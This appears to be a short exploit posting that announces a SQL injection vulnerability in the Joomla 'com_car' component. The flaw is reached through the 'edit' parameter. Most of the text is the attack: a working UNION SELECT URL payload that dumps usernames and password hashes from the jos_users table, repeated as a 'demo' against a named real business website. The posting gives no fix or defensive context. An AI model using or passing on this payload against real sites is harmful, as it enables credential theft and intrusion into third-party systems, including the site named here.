###############################################################
             #                                                             #
             #    Joomla component 'com_car' SQL injection vulnerability   #
             ###############################################################
             #                           #######                           #
             #                                                             #
             #                   xploited by k1ll3r_null                   #
             #                                                             #
      	     #                contact: k1ll3r.null@gmail.com               #
             ###############################################################

                  +++++++ greetz to all p0wnbox.com members !!! +++++++
--------------------------------------------------------------------------------------

Vulnerable joomla component : com_car
vulnerable parameter: "edit"  ($_GET)

-------------------------------------------------------------------------------------------------------------------------

Exploit : 
 

http://www.site.com/index.php?option=com_car&edit=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,char(58),password),14,15,16,17,concat(username,char(58),password),19,20,21,22,23,24+from+jos_users--

View demo :

http://www.pandisciautomobili.com/index.php?option=com_car&edit=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,char(58),password),14,15,16,17,concat(username,char(58),password),19,20,21,22,23,24+from+jos_users--

--------------------------------------------------------------------------------------------------------------------------